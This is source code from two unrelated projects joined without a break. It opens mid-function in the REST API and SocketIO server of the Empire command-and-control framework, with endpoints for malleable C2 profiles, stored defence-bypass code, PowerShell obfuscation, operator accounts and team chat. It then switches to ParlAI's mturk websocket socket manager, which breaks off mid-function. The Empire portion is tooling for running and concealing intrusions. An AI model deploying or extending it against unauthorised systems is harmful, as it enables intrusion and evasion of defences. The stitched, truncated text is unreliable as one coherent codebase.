"host_name": reporting_event.hostname, "taskID": reporting_event.taskID, "task": reporting_event.task,
"results": reporting_event.results})
return jsonify({'reporting': reporting_events})
@app.route('/api/reporting/generate', methods=['GET'])
def generate_report():
"""
Generates reports on the backend database.
"""
report_directory = main.generate_report()
return jsonify({'report': report_directory})
@app.route('/api/reporting/agent/<string:reporting_agent>', methods=['GET'])
def get_reporting_agent(reporting_agent):
"""
Returns JSON describing the reporting events from the backend database for
the agent specified by reporting_agent.
"""
# first resolve the supplied name to a sessionID
session_id = Session().query(models.Agent.session_id).filter(models.Agent.name == reporting_agent).scalar()
if not session_id:
return jsonify({'reporting': ''})
# lots of confusion around name/session_id in these queries.
reporting_raw = Session().query(models.Reporting).filter(models.Reporting.name.contains(session_id)).all()
reporting_events = []
for reporting_event in reporting_raw:
reporting_events.append(
{"ID": reporting_event.id, "agentname": reporting_event.name, "event_type": reporting_event.event_type,
"message": json.loads(reporting_event.message), "timestamp": reporting_event.timestamp,
"taskID": reporting_event.taskID})
return jsonify({'reporting': reporting_events})
@app.route('/api/reporting/type/<string:event_type>', methods=['GET'])
def get_reporting_type(event_type):
"""
Returns JSON describing the reporting events from the backend database for
the event type specified by event_type.
"""
reporting_raw = Session().query(models.Reporting).filter(models.Reporting.event_type == event_type).all()
reporting_events = []
for reporting_event in reporting_raw:
reporting_events.append(
{"ID": reporting_event.id, "agentname": reporting_event.name, "event_type": reporting_event.event_type,
"message": json.loads(reporting_event.message), "timestamp": reporting_event.timestamp,
"taskID": reporting_event.taskID})
return jsonify({'reporting': reporting_events})
@app.route('/api/reporting/msg/<string:msg>', methods=['GET'])
def get_reporting_msg(msg):
"""
Returns JSON describing the reporting events from the backend database for
any messages containing the substring specified by msg.
"""
reporting_raw = Session().query(models.Reporting).filter(models.Reporting.message.contains(msg)).all()
reporting_events = []
for reporting_event in reporting_raw:
reporting_events.append(
{"ID": reporting_event.id, "agentname": reporting_event.name, "event_type": reporting_event.event_type,
"message": json.loads(reporting_event.message), "timestamp": reporting_event.timestamp,
"taskID": reporting_event.taskID})
return jsonify({'reporting': reporting_events})
@app.route('/api/malleable-profiles', methods=['GET'])
def get_malleable_profiles():
"""
Returns JSON with all currently registered profiles.
"""
active_profiles_raw = Session().query(models.Profile).all()
profiles = []
for active_profile in active_profiles_raw:
profiles.append(
{'name': active_profile.name, 'category': active_profile.category,
'data': active_profile.data, 'file_path': active_profile.file_path,
'created_at': active_profile.created_at,
'updated_at': active_profile.updated_at})
return jsonify({"profiles": profiles})
@app.route('/api/malleable-profiles/<string:profile_name>', methods=['GET'])
def get_malleable_profile(profile_name):
"""
Returns JSON with the requested profile
"""
profile = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
if profile:
return {'name': profile.name, 'category': profile.category,
'data': profile.data, 'file_path': profile.file_path,
'created_at': profile.created_at, 'updated_at': profile.updated_at}
return make_response(jsonify({'error': f'malleable profile {profile_name} not found'}), 404)
@app.route('/api/malleable-profiles', methods=['POST'])
def add_malleable_profile():
"""
Add malleable profile to database
"""
if not request.json or 'name' not in request.json or 'category' not in request.json or 'data' not in request.json:
abort(400)
profile_name = request.json['name']
profile_category = request.json['category']
profile_data = request.json['data']
profile = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
if not profile:
profile = models.Profile(name=profile_name,
file_path='',
category=profile_category,
data=profile_data,
)
Session().add(profile)
Session().commit()
return {'name': profile.name, 'category': profile.category,
'data': profile.data, 'file_path': profile.file_path,
'created_at': profile.created_at, 'updated_at': profile.updated_at}
return make_response(jsonify({'error': f'malleable profile {profile_name} already exists'}), 400)
@app.route('/api/malleable-profiles/<string:profile_name>', methods=['DELETE'])
def remove_malleable_profiles(profile_name):
"""
Delete malleable profiles from database.
Note: If a .profile file exists on the server, the profile will repopulate in the database when Empire restarts.
"""
profile = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
if profile:
Session().delete(profile)
Session().commit()
return jsonify({"success": True})
return make_response(jsonify({'error': f'malleable profile {profile_name} not found'}), 404)
@app.route('/api/malleable-profiles/<string:profile_name>', methods=['PUT'])
def edit_malleable_profiles(profile_name):
"""
Edit malleable profiles in database
"""
if not request.json or 'data' not in request.json:
abort(400)
profile_data = request.json['data']
profile = Session().query(models.Profile).filter(models.Profile.name == profile_name).first()
if profile:
profile.data = profile_data
Session().commit()
return {'name': profile.name, 'category': profile.category,
'data': profile.data, 'file_path': profile.file_path,
'created_at': profile.created_at, 'updated_at': profile.updated_at}
return make_response(jsonify({'error': f'malleable profile {profile_name} not found'}), 404)
@app.route('/api/malleable-profiles/export', methods=['POST'])
def export_malleable_profiles():
"""
Export malleable profiles from database to files
"""
# TODO: add option to export profiles from the database to files
return jsonify({"success": True})
@app.route('/api/bypasses', methods=['GET'])
def get_bypasses():
"""
Returns JSON with all the bypasses.
"""
bypasses_raw = Session().query(models.Bypass).all()
bypasses = []
for bypass in bypasses_raw:
bypasses.append({'id': bypass.id, 'name': bypass.name, 'code': bypass.code,
'created_at': bypass.created_at, 'updated_at': bypass.updated_at})
return {"bypasses": bypasses}
@app.route('/api/bypasses/<int:uid>', methods=['GET'])
def get_bypass(uid: int):
"""
Returns JSON with a single bypass
"""
bypass = Session().query(models.Bypass).filter(models.Bypass.id == uid).first()
if not bypass:
return make_response(jsonify({'error': f'bypass {uid} not found'}), 404)
return {'id': bypass.id, 'name': bypass.name, 'code': bypass.code,
'created_at': bypass.created_at, 'updated_at': bypass.updated_at}
@app.route('/api/bypasses', methods=['POST'])
def create_bypass():
"""
Create a bypass
"""
if not request.json or 'name' not in request.json or 'code' not in request.json:
abort(400)
name = request.json['name'].lower()
bypass = Session().query(models.Bypass).filter(models.Bypass.name == name).first()
if not bypass:
bypass = models.Bypass(name=name, code=request.json['code'])
Session().add(bypass)
Session().commit()
return {'id': bypass.id, 'name': bypass.name, 'code': bypass.code,
'created_at': bypass.created_at, 'updated_at': bypass.updated_at}
return make_response(jsonify({'error': f'bypass {name} already exists'}), 400)
@app.route('/api/bypasses/<int:uid>', methods=['PUT'])
def edit_bypass(uid: int):
"""
Edit a bypass
"""
if not request.json or 'code' not in request.json:
abort(400)
bypass = Session().query(models.Bypass).filter(models.Bypass.id == uid).first()
if not bypass:
return make_response(jsonify({'error': f'bypass {uid} not found'}), 404)
bypass.code = request.json['code']
Session().commit()
return {'id': bypass.id, 'name': bypass.name, 'code': bypass.code,
'created_at': bypass.created_at, 'updated_at': bypass.updated_at}
@app.route('/api/bypasses/<int:uid>', methods=['DELETE'])
def delete_bypass(uid: int):
"""
Delete a bypass
"""
bypass = Session().query(models.Bypass).filter(models.Bypass.id == uid).first()
if not bypass:
return make_response(jsonify({'error': f'bypass {uid} not found'}), 404)
Session().delete(bypass)
Session().commit()
return jsonify({"success": True})
@app.route('/api/admin/login', methods=['POST'])
def server_login():
"""
Takes a supplied username and password and returns the current API token
if authentication is accepted.
"""
if not request.json or not 'username' in request.json or not 'password' in request.json:
abort(400)
supplied_username = request.json['username']
supplied_password = request.json['password']
# try to prevent some basic bruting
time.sleep(2)
token = main.users.user_login(supplied_username, supplied_password)
if token:
return jsonify({'token': token})
else:
return make_response('', 401)
@app.route('/api/admin/logout', methods=['POST'])
def server_logout():
"""
Logs out current user
"""
main.users.user_logout(g.user['id'])
return jsonify({'success': True})
@app.route('/api/admin/restart', methods=['GET', 'POST', 'PUT'])
def signal_server_restart():
"""
Signal a restart for the Flask server and any Empire instance.
"""
restart_server()
return jsonify({'success': True})
@app.route('/api/admin/shutdown', methods=['GET', 'POST', 'PUT'])
def signal_server_shutdown():
"""
Signal a shutdown for the Flask server and any Empire instance.
"""
shutdown_server()
return jsonify({'success': True})
@app.route('/api/admin/options', methods=['POST'])
def set_admin_options():
"""
Sets server admin options: global PowerShell obfuscation, the obfuscation command, and keyword obfuscation entries.
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
# Set global obfuscation
if 'obfuscate' in request.json:
if request.json['obfuscate'].lower() == 'true':
main.obfuscate = True
else:
main.obfuscate = False
# if obfuscate command is given then set, otherwise use default
if 'obfuscate_command' in request.json:
main.obfuscateCommand = request.json['obfuscate_command']
# add keywords to the obfuscation database
if 'keyword_obfuscation' in request.json:
keyword = request.json['keyword_obfuscation']
try:
# if no replacement given then generate a random word
if not request.json.get('keyword_replacement'):
keyword_replacement = random.choice(string.ascii_uppercase) + ''.join(
random.choice(string.ascii_uppercase + string.digits) for _ in range(4))
else:
keyword_replacement = request.json['keyword_replacement']
Session().add(models.Function(keyword=keyword, replacement=keyword_replacement))
Session().commit()
except Exception:
print(helpers.color("couldn't connect to Database"))
return jsonify({'success': True})
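# Illustrative admin options body (values are placeholders); any subset of keys may be supplied:
#   {"obfuscate": "true", "obfuscate_command": "<obfuscation command>",
#    "keyword_obfuscation": "<keyword>", "keyword_replacement": "<replacement>"}
# If keyword_replacement is omitted, a random 5-character replacement is generated.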
@app.route('/api/users', methods=['GET'])
def get_users():
"""
Returns JSON of the users from the backend database.
"""
users_raw = Session().query(models.User).all()
user_report = []
for reporting_users in users_raw:
data = {"ID": reporting_users.id, "username": reporting_users.username,
"last_logon_time": reporting_users.last_logon_time, "enabled": reporting_users.enabled,
"admin": reporting_users.admin}
user_report.append(data)
return jsonify({'users': user_report})
@app.route('/api/users/<int:uid>', methods=['GET'])
def get_user(uid):
"""
return the user for an id
"""
user = Session().query(models.User).filter(models.User.id == uid).first()
if user is None:
return make_response(jsonify({'error': 'user %s not found' % uid}), 404)
return jsonify(
{"ID": user.id, "username": user.username, "last_logon_time": user.last_logon_time, "enabled": user.enabled,
"admin": user.admin, "notes": user.notes})
@app.route('/api/users/me', methods=['GET'])
def get_user_me():
"""
Returns the current user.
"""
return jsonify(g.user)
@app.route('/api/users', methods=['POST'])
def create_user():
# Check that input is a valid request
if not request.json or not 'username' in request.json or not 'password' in request.json:
abort(400)
# Check if user is an admin
if not main.users.is_admin(g.user['id']):
abort(403)
status = main.users.add_new_user(request.json['username'], request.json['password'])
return jsonify({'success': status})
@app.route('/api/users/<int:uid>/disable', methods=['PUT'])
def disable_user(uid):
# Don't disable yourself
if not request.json or not 'disable' in request.json or uid == g.user['id']:
abort(400)
# User performing the action should be an admin.
# User being updated should not be an admin.
if not main.users.is_admin(g.user['id']) or main.users.is_admin(uid):
abort(403)
status = main.users.disable_user(uid, request.json['disable'])
return jsonify({'success': status})
@app.route('/api/users/<int:uid>/updatepassword', methods=['PUT'])
def update_user_password(uid):
if not request.json or not 'password' in request.json:
abort(400)
# Must be an admin or updating self.
if not (main.users.is_admin(g.user['id']) or uid == g.user['id']):
abort(403)
status = main.users.update_password(uid, request.json['password'])
return jsonify({'success': status})
@app.route('/api/users/<int:uid>/notes', methods=['POST'])
def update_user_notes(uid):
"""
Update notes for a user.
{"notes" : "notes here"}
"""
if not request.json:
return make_response(jsonify({'error': 'request body must be valid JSON'}), 400)
if 'notes' not in request.json:
return make_response(jsonify({'error': 'JSON body must include key "notes"'}), 400)
user = Session().query(models.User).filter(models.User.id == uid).first()
user.notes = request.json['notes']
Session().commit()
return jsonify({'success': True})
@app.route('/api/plugins/active', methods=['GET'])
def list_active_plugins():
"""
Lists all active plugins
"""
plugins = []
plugin_path = empireMenu.installPath + "/plugins"
all_plugin_names = [name for _, name, _ in pkgutil.walk_packages([plugin_path])]
# check if the plugin has already been loaded
active_plugins = list(empireMenu.loadedPlugins.keys())
for plugin_name in all_plugin_names:
if plugin_name in active_plugins:
data = empireMenu.loadedPlugins[plugin_name].info[0]
data['options'] = empireMenu.loadedPlugins[plugin_name].options
plugins.append(data)
return jsonify({'plugins': plugins})
@app.route('/api/plugins/<string:plugin_name>', methods=['GET'])
def get_plugin(plugin_name):
# check if the plugin has already been loaded
if plugin_name not in empireMenu.loadedPlugins.keys():
try:
empireMenu.do_plugin(plugin_name)
except:
return make_response(jsonify({'error': 'plugin %s not found' % plugin_name}), 400)
# get the commands available to the user. This can probably be done in one step if desired
name = empireMenu.loadedPlugins[plugin_name].get_commands()['name']
commands = empireMenu.loadedPlugins[plugin_name].get_commands()['commands']
description = empireMenu.loadedPlugins[plugin_name].get_commands()['description']
data = {'name': name, 'commands': commands, 'description': description}
return jsonify(data)
@app.route('/api/plugins/<string:plugin_name>', methods=['POST'])
def execute_plugin(plugin_name):
# check if the plugin has been loaded
if plugin_name not in empireMenu.loadedPlugins.keys():
return make_response(jsonify({'error': 'plugin %s not loaded' % plugin_name}), 404)
use_plugin = empireMenu.loadedPlugins[plugin_name]
# set all passed module options
for key, value in request.json.items():
if key not in use_plugin.options:
return make_response(jsonify({'error': 'invalid module option'}), 400)
use_plugin.options[key]['Value'] = value
for option, values in use_plugin.options.items():
if values['Required'] and ((not values['Value']) or (values['Value'] == '')):
return make_response(jsonify({'error': 'required module option missing'}), 400)
if values['Strict'] and values['Value'] not in values['SuggestedValues']:
return make_response(jsonify({'error': f'{option} must be set to one of suggested values.'}), 400)
results = use_plugin.execute(request.json)
if results is False:
return make_response(jsonify({'error': 'internal plugin error'}), 400)
return jsonify({} if results is None else results)
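# Illustrative plugin execution (plugin name is hypothetical):
#   POST /api/plugins/example_plugin with a JSON body mapping option names to values.
# Options marked Required must be non-empty, and Strict options must use one of their SuggestedValues.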
def shutdown_server():
"""
Shut down the Flask server and any Empire instance gracefully.
"""
global serverExitCommand
print(helpers.color("[*] Shutting down Empire RESTful API"))
if suppress:
print(helpers.color("[*] Shutting down the Empire instance"))
main.shutdown()
serverExitCommand = 'shutdown'
func = request.environ.get('werkzeug.server.shutdown')
if func is not None:
func()
def restart_server():
"""
Restart the Flask server and any Empire instance.
"""
global serverExitCommand
shutdown_server()
serverExitCommand = 'restart'
def signal_handler(signal, frame):
"""
Overrides the KeyboardInterrupt signal handler so we can gracefully shut everything down.
"""
global serverExitCommand
with app.test_request_context():
shutdown_server()
serverExitCommand = 'shutdown'
# repair the original signal handler
import signal
signal.signal(signal.SIGINT, signal.default_int_handler)
sys.exit()
try:
signal.signal(signal.SIGINT, signal_handler)
except ValueError:
pass
# wrap the Flask connection in SSL and start it
cert_path = os.path.abspath("./empire/server/data/")
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % cert_path, "%s/empire-priv.key" % cert_path)
app.run(host=ip, port=int(port), ssl_context=context, threaded=True)
def start_sockets(empire_menu: MainMenu, ip='0.0.0.0', port: int = 5000, suppress: bool = False):
app = Flask(__name__)
app.json_encoder = MyJsonEncoder
socketio = SocketIO(app, cors_allowed_origins="*", json=flask.json, async_mode="threading")
empire_menu.socketio = socketio
room = 'general'  # A socketio user is in the general channel if they join the chat.
chat_participants = {}
chat_log = [] # This is really just meant to provide some context to a user that joins the convo.
# In the future we can expand to store chat messages in the db if people want to retain a whole chat log.
if suppress:
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
def get_user_from_token():
user = empire_menu.users.get_user_from_token(request.args.get('token', ''))
if user:
user['password'] = ''
user['api_token'] = ''
return user
@socketio.on('connect')
def connect():
user = get_user_from_token()
if user:
print(helpers.color(f"[+] {user['username']} connected to socketio"))
return
return False
@socketio.on('disconnect')
def test_disconnect():
user = get_user_from_token()
print(helpers.color(f"[+] {'Client' if user is None else user['username']} disconnected from socketio"))
@socketio.on('chat/join')
def on_join(data=None):
"""
The calling user gets added to the "general" chat room.
Note: while 'data' is unused, it is good to leave it as a parameter for compatibility reasons.
The server fails if a client sends data when none is expected.
:return: emits a join event with the user's details.
"""
user = get_user_from_token()
if user['username'] not in chat_participants:
chat_participants[user['username']] = user
join_room(room)
socketio.emit("chat/join", {'user': user,
'username': user['username'],
'message': f"{user['username']} has entered the room."}, room=room)
@socketio.on('chat/leave')
def on_leave(data=None):
"""
The calling user gets removed from the "general" chat room.
:return: emits a leave event with the user's details.
"""
user = get_user_from_token()
if user is not None:
chat_participants.pop(user['username'], None)
leave_room(room)
socketio.emit("chat/leave", {'user': user,
'username': user['username'],
'message': user['username'] + ' has left the room.'}, to=room)
@socketio.on('chat/message')
def on_message(data):
"""
The calling user sends a message.
:param data: contains the user's message.
:return: Emits a message event containing the message and the user's username
"""
user = get_user_from_token()
chat_log.append({'username': user['username'], 'message': data['message']})
socketio.emit("chat/message", {'username': user['username'], 'message': data['message']}, to=room)
@socketio.on('chat/history')
def on_history(data=None):
"""
The calling user gets sent the last 20 messages.
:return: Emit chat messages to the calling user.
"""
sid = request.sid
for entry in chat_log[-20:]:
username = entry['username']
message = entry['message']
socketio.emit("chat/message", {'username': username, 'message': message, 'history': True}, to=sid)
@socketio.on('chat/participants')
def on_participants(data=None):
"""
The calling user gets sent a list of "general" chat participants.
:return: emit participant event containing list of users.
"""
sid = request.sid
socketio.emit("chat/participants", list(chat_participants.values()), to=sid)
print(helpers.color("[*] Starting Empire SocketIO on %s:%s" % (ip, port)))
cert_path = os.path.abspath("./empire/server/data/")
proto = ssl.PROTOCOL_TLS
context = ssl.SSLContext(proto)
context.load_cert_chain("{}/empire-chain.pem".format(cert_path), "{}/empire-priv.key".format(cert_path))
socketio.run(app, host=ip, port=port, ssl_context=context)
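# Illustrative client connection to this SocketIO server, using the python-socketio client as in
# server_startup_validator below (host, port, and token are placeholders):
#   sio = socketio.Client(ssl_verify=False)
#   sio.connect('wss://localhost:5000?token=<api token>')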
def run(args):
def thread_websocket(empire_menu, suppress=False):
try:
start_sockets(empire_menu=empire_menu, suppress=suppress, ip=args.restip, port=int(args.socketport))
except SystemExit as e:
pass
def thread_api(empire_menu):
try:
start_restful_api(empireMenu=empire_menu, suppress=True, username=args.username, password=args.password,
ip=args.restip, port=args.restport)
except SystemExit as e:
pass
def server_startup_validator():
print(helpers.color('[*] Testing APIs'))
username = 'test-' + ''.join(random.choice(string.ascii_lowercase) for i in range(4))
password = ''.join(random.choice(string.ascii_lowercase) for i in range(10))
main.users.add_new_user(username, password)
response = requests.post(url=f'https://{args.restip}:{args.restport}/api/admin/login',
json={'username': username, 'password': password},
verify=False)
if response:
print(helpers.color('[+] Empire RESTful API successfully started'))
try:
sio = socketio.Client(ssl_verify=False)
sio.connect(f'wss://{args.restip}:{args.socketport}?token={response.json()["token"]}')
print(helpers.color('[+] Empire SocketIO successfully started'))
except Exception as e:
print(e)
print(helpers.color('[!] Empire SocketIO failed to start'))
sys.exit()
finally:
cleanup_test_user(username)
sio.disconnect()
else:
print(helpers.color('[!] Empire RESTful API failed to start'))
cleanup_test_user(username)
sys.exit()
def cleanup_test_user(username: str):
print(helpers.color('[*] Cleaning up test user'))
user = Session().query(models.User).filter(models.User.username == username).first()
Session().delete(user)
Session().commit()
if not args.restport:
args.restport = '1337'
else:
args.restport = args.restport[0]
if not args.restip:
args.restip = '0.0.0.0'
else:
args.restip = args.restip[0]
if not args.socketport:
args.socketport = '5000'
else:
args.socketport = args.socketport[0]
if args.version:
print(empire.VERSION)
elif args.reset:
# Reset called from database/base.py
sys.exit()
else:
if not os.path.exists('./empire/server/data/empire-chain.pem'):
print(helpers.color("[*] Certificate not found. Generating..."))
subprocess.call("./setup/cert.sh")
time.sleep(3)
# start an Empire instance and RESTful API with the teamserver interface
main = empire.MainMenu(args=args)
thread = helpers.KThread(target=thread_api, args=(main,))
thread.daemon = True
thread.start()
sleep(2)
thread2 = helpers.KThread(target=thread_websocket, args=(main, False))
thread2.daemon = True
thread2.start()
sleep(2)
server_startup_validator()
main.teamserver()
sys.exit()
socket_manager.py
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import errno
import logging
import json
import threading
import time
from queue import PriorityQueue, Empty
import websocket
from parlai.mturk.core.dev.shared_utils import print_and_log
import parlai.mturk.core.dev.data_model as data_model
import parlai.mturk.core.dev.shared_utils as shared_utils
class Packet:
"""Class for holding information sent over a socket"""
# Possible Packet Status
STATUS_NONE = -1
STATUS_INIT = 0
STATUS_SENT = 1
STATUS_FAIL = 2
# TODO remove unused attributes
def __init__(
self,
id,
type,
sender_id,
receiver_id,
assignment_id,
data,
conversation_id=None,
requires_ack=None,
blocking=None,
ack_func=None,
):
"""
Create a packet to be used for holding information before it is
sent through the socket
id: Unique ID to distinguish this packet from others
type: TYPE of packet (ACK, ALIVE, MESSAGE)
sender_id: Sender ID for this packet
receiver_id: Recipient ID for this packet
assignment_id: Assignment ID for this packet
data: Contents of the packet
conversation_id: Packet metadata - what conversation this belongs to
requires_ack: No longer used.
blocking: No longer used.
ack_func: Function to call upon successful ack of a packet
Default calls no function on ack
"""
self.id = id
# Possible Packet Types are set by data_model
self.type = type
self.sender_id = sender_id
self.receiver_id = receiver_id
self.assignment_id = assignment_id
self.data = data
self.conversation_id = conversation_id
self.ack_func = ack_func
self.status = self.STATUS_INIT
@staticmethod
def from_dict(packet):
"""Create a packet from the dictionary that would
be received over a socket
"""
try:
packet_id = packet['id']
packet_type = packet['type']
sender_id = packet['sender_id']
receiver_id = packet.get('receiver_id', None)
assignment_id = packet.get('assignment_id', None)
data = packet.get('data', '')
conversation_id = packet.get('conversation_id', None)
return Packet(
packet_id,
packet_type,
sender_id,
receiver_id,
assignment_id,
data,
conversation_id,
)
except Exception as e:
print_and_log(
logging.WARN,
'Could not create a valid packet out of the dictionary '
'provided: {}, error: {}'.format(packet, repr(e)),
)
return None
def as_dict(self):
"""Convert a packet into a form that can be pushed over a socket"""
return {
'id': self.id,
'type': self.type,
'sender_id': self.sender_id,
'receiver_id': self.receiver_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'data': self.data,
}
def get_sender_connection_id(self):
"""Get the connection_id that this packet came from"""
return '{}_{}'.format(self.sender_id, self.assignment_id)
def get_receiver_connection_id(self):
"""Get the connection_id that this is going to"""
return '{}_{}'.format(self.receiver_id, self.assignment_id)
def new_copy(self):
"""Return a new packet that is a copy of this packet with
a new id and with a fresh status
"""
packet = Packet.from_dict(self.as_dict())
packet.id = shared_utils.generate_event_id(self.receiver_id)
return packet
def __repr__(self):
return 'Packet <{}>'.format(self.as_dict())
def swap_sender(self):
"""Swaps the sender_id and receiver_id"""
self.sender_id, self.receiver_id = self.receiver_id, self.sender_id
return self
def set_type(self, new_type):
"""Updates the message type"""
self.type = new_type
return self
def set_data(self, new_data):
"""Updates the message data"""
self.data = new_data
return self
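# Minimal illustrative construction (ids and payload are hypothetical):
#   pkt = Packet('pkt-1', data_model.AGENT_MESSAGE, 'worker_1', '[World_1]', 'assign_1', {'text': 'hi'})
#   Packet.from_dict(pkt.as_dict()) rebuilds an equivalent packet (status and ack_func are reset).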
class SocketManager:
"""SocketManager is a wrapper around websocket to conform to the API
allowing the remote state to sync up with our local state.
"""
# Default pings without pong before socket considered dead
DEF_MISSED_PONGS = 20
PING_RATE = 4
DEF_DEAD_TIME = 30
def __init__(
self,
server_url,
port,
alive_callback,
message_callback,
socket_dead_callback,
task_group_id,
socket_dead_timeout=None,
server_death_callback=None,
):
"""
server_url: url at which the server is to be run
port: port for the socket to operate on
alive_callback: function to be called on alive Packets, defined
alive_callback(self, pkt)
message_callback: function to be called on message Packets, defined
message_callback(self, pkt)
socket_dead_callback: function to be called when a socket dies, should
return false if the socket_manager should ignore
the death and treat the socket as alive defined
on_socket_dead(self, worker_id, assignment_id)
socket_dead_timeout: time to wait between pings before dying
"""
self.server_url = server_url
self.port = port
self.alive_callback = alive_callback
self.message_callback = message_callback
self.socket_dead_callback = socket_dead_callback
self.server_death_callback = server_death_callback
if socket_dead_timeout is not None:
self.missed_pongs = 1 + socket_dead_timeout / self.PING_RATE
else:
self.missed_pongs = self.DEF_MISSED_PONGS
self.task_group_id = task_group_id
self.ws = None
self.keep_running = True
# initialize the state
self.listen_thread = None
self.send_thread = None
self.sending_queue = PriorityQueue()
self.open_channels = set()
self.last_sent_ping_time = 0 # time of last ping send
self.pings_without_pong = 0
self.processed_packets = set()
self.packet_map = {}
self.alive = False
self.is_shutdown = False
self.send_lock = threading.Condition()
self.packet_map_lock = threading.Condition()
self.worker_assign_ids = {} # mapping from connection id to pair
# setup the socket
self._setup_socket()
def get_my_sender_id(self):
"""Gives the name that this socket manager should use for its world"""
return '[World_{}]'.format(self.task_group_id)
def _safe_send(self, data, force=False):
if not self.alive and not force:
# Try to wait a half second to send a packet
timeout = 0.5
while timeout > 0 and not self.alive:
time.sleep(0.1)
timeout -= 0.1
if not self.alive:
# don't try to send a packet if we're still dead
return False
try:
with self.send_lock:
self.ws.send(data)
except websocket.WebSocketConnectionClosedException:
# The channel died mid-send, wait for it to come back up
return False
except BrokenPipeError: # noqa F821 we don't support p2
# The channel died mid-send, wait for it to come back up
return False
except AttributeError:
# _ensure_closed was called in parallel, self.ws = None
return False
except Exception as e:
shared_utils.print_and_log(
logging.WARN,
'Unexpected socket error occurred: {}'.format(repr(e)),
should_print=True,
)
return False
return True
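# Note: force=True bypasses the aliveness check above; it is used for the world ALIVE and
# PING registration packets that must be sent before the server has marked this socket alive.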
def _ensure_closed(self):
self.alive = False
if self.ws is None:
return
try:
self.ws.close()
except websocket.WebSocketConnectionClosedException:
pass
self.ws = None
def _send_world_alive(self):
"""Registers world with the passthrough server"""
self._safe_send(
json.dumps(
{
'type': data_model.AGENT_ALIVE,
'content': {
'id': 'WORLD_ALIVE',
'sender_id': self.get_my_sender_id(),
},
}
),
force=True,
)
def _try_send_world_ping(self):
if time.time() - self.last_sent_ping_time > self.PING_RATE:
self._safe_send(
json.dumps(
{
'type': data_model.WORLD_PING,
'content': {
'id': 'WORLD_PING',
'sender_id': self.get_my_sender_id(),
},
}
),
force=True,
)
self.last_sent_ping_time = time.time()
def _send_packet(self, packet, send_time):
"""Sends a packet, blocks if the packet is blocking"""
# Send the packet
pkt = packet.as_dict()
if pkt['data'] is None or packet.status == Packet.STATUS_SENT:
return # This packet was _just_ sent.
shared_utils.print_and_log(logging.DEBUG, 'Send packet: {}'.format(packet))
result = self._safe_send(json.dumps({'type': pkt['type'], 'content': pkt}))
if not result:
# The channel died mid-send, wait for it to come back up
self.sending_queue.put((send_time, packet))
return
packet.status = Packet.STATUS_SENT
if packet.ack_func is not None:
packet.ack_func(packet)
def _spawn_reaper_thread(self):
def _reaper_thread(*args):
start_time = time.time()
wait_time = self.DEF_MISSED_PONGS * self.PING_RATE
while time.time() - start_time < wait_time:
if self.is_shutdown:
return
if self.alive:
return
time.sleep(0.3)
if self.server_death_callback is not None:
shared_utils.print_and_log(
logging.WARN,
'Server has disconnected and could not reconnect. '
'Assuming the worst and calling the death callback. '
'(Usually shutdown)',
should_print=True,
)
self.server_death_callback()
reaper_thread = threading.Thread(
target=_reaper_thread, name='socket-reaper-{}'.format(self.task_group_id)
)
reaper_thread.daemon = True
reaper_thread.start()
def _setup_socket(self):
"""Create socket handlers and registers the socket"""
def on_socket_open(*args):
shared_utils.print_and_log(logging.DEBUG, 'Socket open: {}'.format(args))
self._send_world_alive()
def on_error(ws, error):
try:
if error.errno == errno.ECONNREFUSED:
self.use_socket = False
self._ensure_closed()
raise Exception("Socket refused connection, cancelling")
else:
shared_utils.print_and_log(
logging.WARN, 'Socket logged error: {}'.format(error)
)
self._ensure_closed()
except Exception:
if type(error) is websocket.WebSocketConnectionClosedException:
return # Connection closed is noop
shared_utils.print_and_log(
logging.WARN,
'Socket logged error: {} Restarting'.format(repr(error)),
)
self._ensure_closed()
def on_disconnect(*args):
"""Disconnect event is a no-op for us, as the server reconnects
automatically on a retry. Just in case the server is actually
dead we set up a thread to reap the whole task.
"""
shared_utils.print_and_log(
logging.INFO, 'World server disconnected: {}'.format(args)
)
self._ensure_closed()
if not self.is_shutdown:
self._spawn_reaper_thread()
def on_message(*args):
"""Incoming message handler for SERVER_PONG, MESSAGE_BATCH,
AGENT_DISCONNECT, SNS_MESSAGE, SUBMIT_MESSAGE, AGENT_ALIVE
"""
packet_dict = json.loads(args[1])
if packet_dict['type'] == 'conn_success': # TODO make socket func
self.alive = True
return
# The packet inherits the socket function type
packet_dict['content']['type'] = packet_dict['type']
packet = Packet.from_dict(packet_dict['content'])
if packet is None:
return
packet_id = packet.id
packet_type = packet.type
if packet_id in self.processed_packets:
return # no need to handle already-processed packets
# Note to self that this packet has already been processed,
# and shouldn't be processed again in the future
self.processed_packets.add(packet_id)
if packet_type == data_model.SERVER_PONG:
# Incoming pong means our ping was returned
self.pings_without_pong = 0
elif packet_type == data_model.AGENT_ALIVE:
# agent is connecting for the first time
self.alive_callback(packet)
self.processed_packets.add(packet_id)
elif packet_type == data_model.MESSAGE_BATCH:
# Any number of agents are included in this message batch,
# so process each individually
batched_packets = packet.data['messages']
for batched_packet_dict in batched_packets:
batched_packet_dict['type'] = data_model.AGENT_MESSAGE
batched_packet = Packet.from_dict(batched_packet_dict)
self.message_callback(batched_packet)
elif packet_type == data_model.AGENT_DISCONNECT:
# Server detected an agent disconnect, extract and remove
disconnected_id = packet.data['connection_id']
worker_id, assign_id = self.worker_assign_ids[disconnected_id]
self.socket_dead_callback(worker_id, assign_id)
elif packet_type == data_model.SNS_MESSAGE:
# Treated as a regular message
self.message_callback(packet)
elif packet_type == data_model.SUBMIT_MESSAGE:
# Treated as a regular message
self.message_callback(packet)
def run_socket(*args):
url_base_name = self.server_url.split('https://')[1]
protocol = "wss"
if url_base_name in ['localhost', '127.0.0.1']:
protocol = "ws"
while self.keep_running:
try:
sock_addr = "{}://{}:{}/".format(protocol, url_base_name, self.port)
self.ws = websocket.WebSocketApp(
sock_addr,
on_message=on_message,
on_error=on_error,
on_close=on_disconnect,
)
